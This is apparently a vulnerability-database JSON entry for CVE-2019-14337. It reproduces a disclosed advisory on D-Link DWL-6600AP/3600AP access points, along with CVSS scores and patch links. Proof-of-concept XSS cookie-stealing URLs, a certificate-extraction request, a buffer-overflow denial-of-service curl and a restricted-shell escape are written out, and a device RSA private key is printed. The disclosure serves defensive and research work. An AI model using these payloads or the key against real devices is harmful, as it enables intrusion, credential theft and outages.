An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is an ability to escape to a shell in the restricted command line interface, as demonstrated by the /bin/sh -c wget sequence. D-Link 6600-AP and DWL-3600AP devices have vulnerabilities related to authorization, permissions, and access control. Information may be obtained. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. No details of the vulnerability are currently provided. D-Link 6600-AP and DWL-3600AP version 4.2.0.14 has a permission and access control issue vulnerability. An attacker could exploit this vulnerability to gain access to a restricted CLI shell.
# Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Note that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=alert(document.cookie)
Example 2: http://10.90.90.91/admin.cgi?action=+guestalert('Pwned')
2. Post-authenticated Certificate and RSA Private Key extraction through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
-s Spider mode - only check file existence
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-T SEC Network read timeout is SEC seconds
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0915",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14337",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14337",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29141",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-146273",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14337",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-14337",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14337",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14337",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29141",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1630",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146273",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is an ability to escape to a shell in the restricted command line interface, as demonstrated by the `/bin/sh -c wget` sequence. D-Link 6600-AP and DWL-3600AP Devices have vulnerabilities related to authorization, permissions, and access control.Information may be obtained. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. There are currently no detailed details of the vulnerability provided. D-Link 6600-AP and DWL-3600AP version 4.2.0.14 has a permission and access control issue vulnerability. An attacker could exploit this vulnerability to gain access to a restricted CLI shell. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. 
With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to\nthe reboot of the AP\n 4. CVE-2019-14335 - Post-authenticated Denial of service leading to\nthe reboot of the AP\n 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. 
Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee\nHk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o\nBioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B\nvsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t\n7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c\nunyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk\n1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6\nJ8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14\nyRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z\n0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc\nfmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB\ni5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb\ndAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ\nOztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ\nVuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9\nJ3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr\nH975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw\nuF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy\nyGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd\npagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co\npaZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8\n1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm\nfPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS\nokObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px\nbgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY\n-----END RSA PRIVATE 
KEY-----\n-----BEGIN CERTIFICATE-----\nMIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx\nMC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp\nbmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL\nMAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU\nMBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG\nA1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE\nCBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu\nOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB\nBQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp\nwRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC\nI+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW\n2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK\nYwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N\n29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B\nAQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS\n7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME\n9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5\nbeF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE\n45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef\nMjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==\n-----END CERTIFICATE-----\n\n### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. 
\nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. 
\n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14337"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2019-14337",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29141",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146273",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"id": "VAR-201908-0915",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
}
],
"trust": 1.3903846
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
}
]
},
"last_update_date": "2024-11-23T21:52:00.695000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "D-Link 6600-AP and DWL-3600AP have unexplained patches",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177601"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95740"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14337"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
